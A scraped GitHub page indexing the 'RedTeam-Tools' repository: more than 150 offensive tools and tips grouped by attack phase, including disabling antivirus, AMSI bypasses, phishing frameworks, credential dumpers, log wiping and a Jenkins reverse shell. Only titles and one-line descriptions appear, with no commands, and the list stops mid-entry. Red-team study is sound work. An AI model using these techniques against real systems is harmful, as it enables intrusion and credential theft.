prc-Button-VisualWrap-Db-eB"><svg aria-hidden="true" focusable="false" class="octicon octicon-triangle-down" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></span></span></button><div class="Box-sc-g0xbh4-0 izFOf"><button data-component="IconButton" type="button" aria-label="Open more actions menu" aria-haspopup="true" aria-expanded="false" tabindex="0" class="prc-Button-ButtonBase-c50BI prc-Button-IconButton-szpyj" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="default" aria-describedby=":R75ab:-loading-announcement" id=":R75ab:"><svg aria-hidden="true" focusable="false" class="octicon octicon-kebab-horizontal" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg></button></div></div></div><div class="Box-sc-g0xbh4-0 vIPPs"><div data-hpc="true"><button hidden="" data-testid="focus-next-element-button" data-hotkey="j"></button><button hidden="" data-testid="focus-previous-element-button" data-hotkey="k"></button><h2 class="sr-only ScreenReaderHeading-module__userSelectNone--vW4Cq prc-Heading-Heading-6CmGO" data-testid="screen-reader-heading" id="folders-and-files">Folders and files</h2><table aria-labelledby="folders-and-files" class="Box-sc-g0xbh4-0 fdROMU"><thead class="Box-sc-g0xbh4-0 jGKpsv"><tr class="Box-sc-g0xbh4-0 jdgHnn"><th colSpan="2" class="Box-sc-g0xbh4-0 bQivRW"><span class="text-bold">Name</span></th><th colSpan="1" class="Box-sc-g0xbh4-0 ldkMIO"><span class="text-bold">Name</span></th><th class="hide-sm"><div title="Last commit message" class="Truncate__StyledTruncate-sc-23o1d2-0 liVpTx width-fit"><span class="text-bold">Last commit message</span></div></th><th colSpan="1" class="Box-sc-g0xbh4-0 jMbWeI"><div title="Last commit date" class="Truncate__StyledTruncate-sc-23o1d2-0 liVpTx width-fit"><span class="text-bold">Last commit date</span></div></th></tr></thead><tbody><tr class="Box-sc-g0xbh4-0 gpqjiB"><td colSpan="3" class="bgColor-muted p-1 rounded-top-2"><div class="Box-sc-g0xbh4-0 dzCJzi"><h2 class="sr-only ScreenReaderHeading-module__userSelectNone--vW4Cq prc-Heading-Heading-6CmGO" data-testid="screen-reader-heading">Latest commit</h2><div style="width:120px" class="Skeleton Skeleton--text" data-testid="loading"> </div><div class="d-flex flex-shrink-0 gap-2"><div data-testid="latest-commit-details" class="d-none d-sm-flex flex-items-center"></div><div class="d-flex gap-2"><h2 class="sr-only ScreenReaderHeading-module__userSelectNone--vW4Cq prc-Heading-Heading-6CmGO" data-testid="screen-reader-heading">History</h2><a href="/A-poc/RedTeam-Tools/commits/main/" class="prc-Button-ButtonBase-c50BI d-none d-lg-flex LinkButton-module__code-view-link-button--xvCGA flex-items-center fgColor-default" data-loading="false" data-size="small" data-variant="invisible" aria-describedby=":Raqj8pab:-loading-announcement"><span data-component="buttonContent" data-align="center" class="prc-Button-ButtonContent-HKbr-"><span data-component="leadingVisual" class="prc-Button-Visual-2epfX prc-Button-VisualWrap-Db-eB"><svg aria-hidden="true" focusable="false" class="octicon octicon-history" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg></span><span data-component="text" class="prc-Button-Label-pTQ3x"><span class="fgColor-default">197 Commits</span></span></span></a><div class="d-sm-none"></div><div class="d-flex d-lg-none"><span role="tooltip" aria-label="197 Commits" id="history-icon-button-tooltip" class="Tooltip__TooltipBase-sc-17tf59c-0 hWlpPn tooltipped-n"><a href="/A-poc/RedTeam-Tools/commits/main/" class="prc-Button-ButtonBase-c50BI LinkButton-module__code-view-link-button--xvCGA flex-items-center fgColor-default" data-loading="false" data-size="small" data-variant="invisible" aria-describedby=":R1iqj8pab:-loading-announcement history-icon-button-tooltip"><span data-component="buttonContent" data-align="center" class="prc-Button-ButtonContent-HKbr-"><span data-component="leadingVisual" class="prc-Button-Visual-2epfX prc-Button-VisualWrap-Db-eB"><svg aria-hidden="true" focusable="false" class="octicon octicon-history" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg></span></span></a></span></div></div></div></div></td></tr><tr class="react-directory-row undefined" id="folder-row-0"><td class="react-directory-row-name-cell-small-screen" colSpan="2"><div class="react-directory-filename-column"><svg aria-hidden="true" focusable="false" class="octicon octicon-file color-fg-muted" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg><div class="overflow-hidden"><div class="react-directory-filename-cell"><div class="react-directory-truncate"><a title="README.md" aria-label="README.md, (File)" class="Link--primary" href="/A-poc/RedTeam-Tools/blob/main/README.md">README.md</a></div></div></div></div></td><td class="react-directory-row-name-cell-large-screen" colSpan="1"><div class="react-directory-filename-column"><svg aria-hidden="true" focusable="false" class="octicon octicon-file color-fg-muted" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg><div class="overflow-hidden"><div class="react-directory-filename-cell"><div class="react-directory-truncate"><a title="README.md" aria-label="README.md, (File)" class="Link--primary" href="/A-poc/RedTeam-Tools/blob/main/README.md">README.md</a></div></div></div></div></td><td class="react-directory-row-commit-cell"><div class="Skeleton Skeleton--text"> </div></td><td><div class="Skeleton Skeleton--text"> </div></td></tr><tr class="react-directory-row undefined" id="folder-row-1"><td class="react-directory-row-name-cell-small-screen" colSpan="2"><div class="react-directory-filename-column"><svg aria-hidden="true" focusable="false" class="octicon octicon-file color-fg-muted" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg><div class="overflow-hidden"><div class="react-directory-filename-cell"><div class="react-directory-truncate"><a title="backlog" aria-label="backlog, (File)" class="Link--primary" href="/A-poc/RedTeam-Tools/blob/main/backlog">backlog</a></div></div></div></div></td><td class="react-directory-row-name-cell-large-screen" colSpan="1"><div class="react-directory-filename-column"><svg aria-hidden="true" focusable="false" class="octicon octicon-file color-fg-muted" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg><div class="overflow-hidden"><div class="react-directory-filename-cell"><div class="react-directory-truncate"><a title="backlog" aria-label="backlog, (File)" class="Link--primary" href="/A-poc/RedTeam-Tools/blob/main/backlog">backlog</a></div></div></div></div></td><td class="react-directory-row-commit-cell"><div class="Skeleton Skeleton--text"> </div></td><td><div class="Skeleton Skeleton--text"> </div></td></tr><tr class="Box-sc-g0xbh4-0 eNCcrz d-none" data-testid="view-all-files-row"><td colSpan="3" class="Box-sc-g0xbh4-0 bHTcCe"><div><button class="prc-Link-Link-85e08">View all files</button></div></td></tr></tbody></table></div><div class="Box-sc-g0xbh4-0 csrIcr"><div class="Box-sc-g0xbh4-0 bUQNHB"><div itemscope="" itemType="https://schema.org/abstract" class="Box-sc-g0xbh4-0 jPdcfu"><h2 class="_VisuallyHidden__VisuallyHidden-sc-11jhm7a-0 brGdpi">Repository files navigation</h2><nav class="Box-sc-g0xbh4-0 iphEWz prc-components-UnderlineWrapper-oOh5J" aria-label="Repository files"><ul class="prc-components-UnderlineItemList-b23Hf" role="list"><li class="Box-sc-g0xbh4-0 hUCRAk"><a class="prc-components-UnderlineItem-lJsg-" href="#" aria-current="page"><span data-component="icon"><svg aria-hidden="true" focusable="false" class="octicon octicon-book" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path></svg></span><span data-component="text" data-content="README">README</span></a></li></ul></nav><button style="--button-color:fg.subtle" type="button" aria-label="Outline" aria-haspopup="true" aria-expanded="false" tabindex="0" class="Box-sc-g0xbh4-0 cwoBXV prc-Button-ButtonBase-c50BI" data-loading="false" data-size="medium" data-variant="invisible" aria-describedby=":Rr9ab:-loading-announcement" id=":Rr9ab:"><svg aria-hidden="true" focusable="false" class="octicon octicon-list-unordered" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M5.75 2.5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5ZM2 14a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm1-6a1 1 0 1 1-2 0 1 1 0 0 1 2 0ZM2 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg></button></div><div class="Box-sc-g0xbh4-0 QkQOb js-snippet-clipboard-copy-unpositioned undefined" data-hpc="true"><article class="markdown-body entry-content container-lg" itemprop="text"><div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">RedTeam-Tools</h1><a id="user-content-redteam-tools" class="anchor" aria-label="Permalink: RedTeam-Tools" href="#redteam-tools"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p align="center" dir="auto"> <a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210680426-20a92131-56f9-43ad-be82-f449e3215dda.png"><img src="https://user-images.githubusercontent.com/100603074/210680426-20a92131-56f9-43ad-be82-f449e3215dda.png" height="300" style="max-width: 100%;"></a> </p> <p dir="auto">This github repository contains a collection of <strong>150+</strong> <strong>tools</strong> and <strong>resources</strong> that can be useful for <strong>red teaming activities</strong>.</p> <p dir="auto">Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.</p> <blockquote> <p dir="auto">🔗 If you are a Blue Teamer, check out <a href="https://github.com/A-poc/BlueTeam-Tools">BlueTeam-Tools</a></p> </blockquote> <blockquote> <p dir="auto"><strong>Warning</strong></p> <p dir="auto"><em>The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.</em></p> </blockquote> <blockquote> <p dir="auto"><strong>Note</strong></p> <p dir="auto"><em>Hide Tool List headings with the arrow.</em></p> <p dir="auto"><em>Click 🔙 to get back to the list.</em></p> </blockquote> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Tool List</h1><a id="user-content-tool-list" class="anchor" aria-label="Permalink: Tool List" href="#tool-list"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <details open=""> <summary><b>Red Team Tips</b> 19 tips</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#improved-html-smuggling-with-mouse-move-eventlistener">Improved HTML smuggling with mouse move eventlistener</a></b><i> @pr0xylife</i></li> <li><b><a href="#google-translate-for-phishing">Google translate for phishing</a></b><i> @malmoeb</i></li> <li><b><a href="#hiding-the-local-admin-account">Hiding the local admin account</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#cripple-windows-defender-by-deleting-signatures">Cripple windows defender by deleting signatures</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#enable-multiple-rdp-sessions-per-user">Enable multiple RDP sessions per user</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#sysinternals-psexecexe-local-alternative">Sysinternals PsExec.exe local alternative</a></b><i> @GuhnooPlusLinux</i></li> <li><b><a href="#live-off-the-land-port-scanner">Live off the land port scanner</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#proxy-aware-powershell-downloadstring">Proxy aware PowerShell DownloadString</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#looking-for-internal-endpoints-in-browser-bookmarks">Looking for internal endpoints in browser bookmarks</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#query-dns-records-for-enumeration">Query DNS records for enumeration</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#unquoted-service-paths-without-powerup">Unquoted service paths without PowerUp</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#bypass-a-disabled-command-prompt-with-k">Bypass a disabled command prompt with /k</a></b><i> Martin Sohn Christensen</i></li> <li><b><a href="#stop-windows-defender-deleting-mimikatzexe">Stop windows defender deleting mimikatz.exe</a></b><i> @GuhnooPlusLinux</i></li> <li><b><a href="#check-if-you-are-in-a-virtual-machine">Check if you are in a virtual machine</a></b><i> @dmcxblue</i></li> <li><b><a href="#enumerate-applocker-rules">Enumerate AppLocker rules</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#cmd-shortcut-with-6-pixels-via-mspaint">CMD shortcut with 6 pixels via mspaint</a></b><i> PenTestPartners</i></li> <li><b><a href="#link-spoofing-with-preventdefault-javascript-method">Link spoofing with PreventDefault JavaScript method</a></b><i> </i></li> <li><b><a href="#check-smb-firewall-rules-with-responder">Check SMB firewall rules with Responder</a></b><i> @malmoeb</i></li> <li><b><a href="#disable-av-with-sysinternals-pssuspend">Disable AV with SysInternals PsSuspend</a></b><i> @0gtweet</i></li> </ul> </ul> </details> <details open=""> <summary><b>Reconnaissance</b> 24 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#spiderfoot">spiderfoot</a></b><i> Automated OSINT and attack surface mapping</i></li> <li><b><a href="#reconftw">reconftw</a></b><i> Automated subdomain and vulnerability recon tool</i></li> <li><b><a href="#subzy">subzy</a></b><i> Subdomain takeover vulnerability checker</i></li> <li><b><a href="#smtp-user-enum">smtp-user-enum</a></b><i> SMTP user enumeration</i></li> <li><b><a href="#crtsh---httprobe---eyewitness">crt.sh -> httprobe -> EyeWitness</a></b><i> Automated domain screenshotting</i></li> <li><b><a href="#jsendpoints">jsendpoints</a></b><i> Extract page DOM links</i></li> <li><b><a href="#nuclei">nuclei</a></b><i> Vulnerability scanner</i></li> <li><b><a href="#certsniff">certSniff</a></b><i> Certificate transparency log keyword sniffer</i></li> <li><b><a href="#gobuster">gobuster</a></b><i> Website path brute force</i></li> <li><b><a href="#feroxbuster">feroxbuster</a></b><i> Fast content discovery tool written in Rust</i></li> <li><b><a href="#cloudbrute">CloudBrute</a></b><i> Cloud infrastructure brute force</i></li> <li><b><a href="#dnsrecon">dnsrecon</a></b><i> Enumerate DNS records</i></li> <li><b><a href="#shodanio">Shodan.io</a></b><i> Public facing system knowledge base</i></li> <li><b><a href="#aort">AORT (All in One Recon Tool)</a></b><i> Subdomain enumeration</i></li> <li><b><a href="#spoofcheck">spoofcheck</a></b><i> SPF/DMARC record checker</i></li> <li><b><a href="#awsbucketdump">AWSBucketDump</a></b><i> S3 bucket enumeration</i></li> <li><b><a href="#githarvester">GitHarvester</a></b><i> GitHub credential searcher</i></li> <li><b><a href="#trufflehog">truffleHog</a></b><i> GitHub credential scanner</i></li> <li><b><a href="#dismap">Dismap</a></b><i> Asset discovery/identification</i></li> <li><b><a href="#enum4linux">enum4linux</a></b><i> Windows/samba enumeration</i></li> <li><b><a href="#skanuvaty">skanuvaty</a></b><i> Dangerously fast dns/network/port scanner</i></li> <li><b><a href="#metabigor">Metabigor</a></b><i> OSINT tool without API</i></li> <li><b><a href="#gitrob">Gitrob</a></b><i> GitHub sensitive information scanner</i></li> <li><b><a href="#gowitness">gowitness</a></b><i> Web screenshot utility using Chrome Headless</i></li> </ul> </ul> </details> <details open=""> <summary><b>Resource Development</b> 12 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#remoteinjector">remoteinjector</a></b><i> Inject remote template link into word document</i></li> <li><b><a href="#chimera">Chimera</a></b><i> PowerShell obfuscation</i></li> <li><b><a href="#msfvenom">msfvenom</a></b><i> Payload creation</i></li> <li><b><a href="#shellter">Shellter</a></b><i> Dynamic shellcode injection tool</i></li> <li><b><a href="#freeze">Freeze</a></b><i> Payload creation (circumventing EDR)</i></li> <li><b><a href="#wordsteal">WordSteal</a></b><i> Steal NTML hashes with Microsoft Word</i></li> <li><b><a href="#ntapi-undocumented-functions">NTAPI Undocumented Functions</a></b><i> Windows NT Kernel, Native API and drivers</i></li> <li><b><a href="#kernel-callback-functions">Kernel Callback Functions</a></b><i> Undocumented Windows APIs</i></li> <li><b><a href="#offensivevba">OffensiveVBA</a></b><i> Office macro code execution and evasion techniques</i></li> <li><b><a href="#wsh">WSH</a></b><i> Wsh payload</i></li> <li><b><a href="#hta">HTA</a></b><i> Hta payload</i></li> <li><b><a href="#vba">VBA</a></b><i> Vba payload</i></li> </ul> </ul> </details> <details open=""> <summary><b>Initial Access</b> 10 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#credmaster">CredMaster</a></b><i> CredKing password spraying tool</i></li> <li><b><a href="#trevorspray">TREVORspray</a></b><i> Password sprayer with threading</i></li> <li><b><a href="#evilqr">evilqr</a></b><i> QRLJacking phishing PoC</i></li> <li><b><a href="#cupp">CUPP</a></b><i> Common User Passwords Profiler (CUPP)</i></li> <li><b><a href="#bash-bunny">Bash Bunny</a></b><i> USB attack tool</i></li> <li><b><a href="#evilgophish">EvilGoPhish</a></b><i> Phishing campaign framework</i></li> <li><b><a href="#social-engineer-toolkit-set">The Social-Engineer Toolkit</a></b><i> Phishing campaign framework</i></li> <li><b><a href="#hydra">Hydra</a></b><i> Brute force tool</i></li> <li><b><a href="#squarephish">SquarePhish</a></b><i> OAuth/QR code phishing framework</i></li> <li><b><a href="#king-phisher">King Phisher</a></b><i> Phishing campaign framework</i></li> </ul> </ul> </details> <details open=""> <summary><b>Execution</b> 13 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#responder">Responder</a></b><i> LLMNR, NBT-NS and MDNS poisoner</i></li> <li><b><a href="#secretsdump">secretsdump</a></b><i> Remote hash dumper</i></li> <li><b><a href="#evil-winrm">evil-winrm</a></b><i> WinRM shell</i></li> <li><b><a href="#donut">Donut</a></b><i> In-memory .NET execution</i></li> <li><b><a href="#macro_pack">Macro_pack</a></b><i> Macro obfuscation</i></li> <li><b><a href="#powersploit">PowerSploit</a></b><i> PowerShell script suite</i></li> <li><b><a href="#rubeus">Rubeus</a></b><i> Active directory hack tool</i></li> <li><b><a href="#sharpup">SharpUp</a></b><i> Windows vulnerability identifier</i></li> <li><b><a href="#sqlrecon">SQLRecon</a></b><i> Offensive MS-SQL toolkit</i></li> <li><b><a href="#ultimateapplockerbypasslist">UltimateAppLockerByPassList</a></b><i> Common AppLocker Bypass Techniques</i></li> <li><b><a href="#starfighters">StarFighters</a></b><i> JavaScript and VBScript Based Empire Launcher</i></li> <li><b><a href="#demiguise">demiguise</a></b><i> HTA encryption tool</i></li> <li><b><a href="#powerzure">PowerZure</a></b><i> PowerShell framework to assess Azure security</i></li> </ul> </ul> </details> <details open=""> <summary><b>Persistence</b> 4 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#impacket">Impacket</a></b><i> Python script suite</i></li> <li><b><a href="#empire">Empire</a></b><i> Post-exploitation framework</i></li> <li><b><a href="#sharpersist">SharPersist</a></b><i> Windows persistence toolkit</i></li> <li><b><a href="#ligolo-ng">ligolo-ng</a></b><i> Tunneling tool that uses a TUN interface</i></li> </ul> </ul> </details> <details open=""> <summary><b>Privilege Escalation</b> 11 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#crassus">Crassus</a></b><i> Windows privilege escalation discovery tool</i></li> <li><b><a href="#linpeas">LinPEAS</a></b><i> Linux privilege escalation</i></li> <li><b><a href="#winpeas">WinPEAS</a></b><i> Windows privilege escalation</i></li> <li><b><a href="#linux-smart-enumeration">linux-smart-enumeration</a></b><i> Linux privilege escalation</i></li> <li><b><a href="#certify">Certify</a></b><i> Active directory privilege escalation</i></li> <li><b><a href="#get-gpppassword">Get-GPPPassword</a></b><i> Windows password extraction</i></li> <li><b><a href="#sherlock">Sherlock</a></b><i> PowerShell privilege escalation tool</i></li> <li><b><a href="#watson">Watson</a></b><i> Windows privilege escalation tool</i></li> <li><b><a href="#impulsivedllhijack">ImpulsiveDLLHijack</a></b><i> DLL Hijack tool</i></li> <li><b><a href="#adfsdump">ADFSDump</a></b><i> AD FS dump tool</i></li> <li><b><a href="#beroot">BeRoot</a></b><i> Multi OS Privilege Escalation Project</i></li> </ul> </ul> </details> <details open=""> <summary><b>Defense Evasion</b> 8 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#invoke-obfuscation">Invoke-Obfuscation</a></b><i> Script obfuscator</i></li> <li><b><a href="#veil">Veil</a></b><i> Metasploit payload obfuscator</i></li> <li><b><a href="#sharpblock">SharpBlock</a></b><i> EDR bypass via entry point execution prevention</i></li> <li><b><a href="#alcatraz">Alcatraz</a></b><i> GUI x64 binary obfuscator</i></li> <li><b><a href="#mangle">Mangle</a></b><i> Compiled executable manipulation</i></li> <li><b><a href="#amsi-fail">AMSI Fail</a></b><i> PowerShell snippets that break or disable AMSI</i></li> <li><b><a href="#scarecrow">ScareCrow</a></b><i> Payload creation framework designed around EDR bypass</i></li> <li><b><a href="#moonwalk">moonwalk</a></b><i> Linux system log and filesystem timestamp remover</i></li> </ul> </ul> </details> <details open=""> <summary><b>Credential Access</b> 11 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#mimikatz">Mimikatz</a></b><i> Windows credential extractor</i></li> <li><b><a href="#lazagne">LaZagne</a></b><i> Local password extractor</i></li> <li><b><a href="#hashcat">hashcat</a></b><i> Password hash cracking</i></li> <li><b><a href="#john-the-ripper">John the Ripper</a></b><i> Password hash cracking</i></li> <li><b><a href="#scomdecrypt">SCOMDecrypt</a></b><i> SCOM Credential Decryption Tool</i></li> <li><b><a href="#nanodump">nanodump</a></b><i> LSASS process minidump creation</i></li> <li><b><a href="#eviltree">eviltree</a></b><i> Tree remake for credential discovery</i></li> <li><b><a href="#seeyoucm-thief">SeeYouCM-Thief</a></b><i> Cisco phone systems configuration file parsing</i></li> <li><b><a href="#mailsniper">MailSniper</a></b><i> Microsoft Exchange Mail Searcher</i></li> <li><b><a href="#sharpchromium">SharpChromium</a></b><i> Cookie, history and saved login chromium extractor</i></li> <li><b><a href="#dploot">dploot</a></b><i> DPAPI looting remotely in Python</i></li> </ul> </ul> </details> <details open=""> <summary><b>Discovery</b> 6 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#pcredz">PCredz</a></b><i> Credential discovery PCAP/live interface</i></li> <li><b><a href="#pingcastle">PingCastle</a></b><i> Active directory assessor</i></li> <li><b><a href="#seatbelt">Seatbelt</a></b><i> Local vulnerability scanner</i></li> <li><b><a href="#adrecon">ADRecon</a></b><i> Active directory recon</i></li> <li><b><a href="#adidnsdump">adidnsdump</a></b><i> Active Directory Integrated DNS dumping</i></li> <li><b><a href="#scavenger">scavenger</a></b><i> Scanning tool for scavenging systems</i></li> </ul> </ul> </details> <details open=""> <summary><b>Lateral Movement</b> 12 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#crackmapexec">crackmapexec</a></b><i> Windows/Active directory lateral movement toolkit</i></li> <li><b><a href="#wmiops">WMIOps</a></b><i> WMI remote commands</i></li> <li><b><a href="#powerlessshell">PowerLessShell</a></b><i> Remote PowerShell without PowerShell</i></li> <li><b><a href="#psexec">PsExec</a></b><i> Light-weight telnet-replacement</i></li> <li><b><a href="#liquidsnake">LiquidSnake</a></b><i> Fileless lateral movement</i></li> <li><b><a href="#enabling-rdp">Enabling RDP</a></b><i> Windows RDP enable command</i></li> <li><b><a href="#upgrading-shell-to-meterpreter">Upgrading shell to meterpreter</a></b><i> Reverse shell improvement</i></li> <li><b><a href="#forwarding-ports">Forwarding Ports</a></b><i> Local port forward command</i></li> <li><b><a href="#jenkins-reverse-shell">Jenkins reverse shell</a></b><i> Jenkins shell command</i></li> <li><b><a href="#adfspoof">ADFSpoof</a></b><i> Forge AD FS security tokens</i></li> <li><b><a href="#kerbrute">kerbrute</a></b><i> A tool to perform Kerberos pre-auth bruteforcing</i></li> <li><b><a href="#coercer">Coercer</a></b><i> Coerce a Windows server to authenticate</i></li> <li><b><a 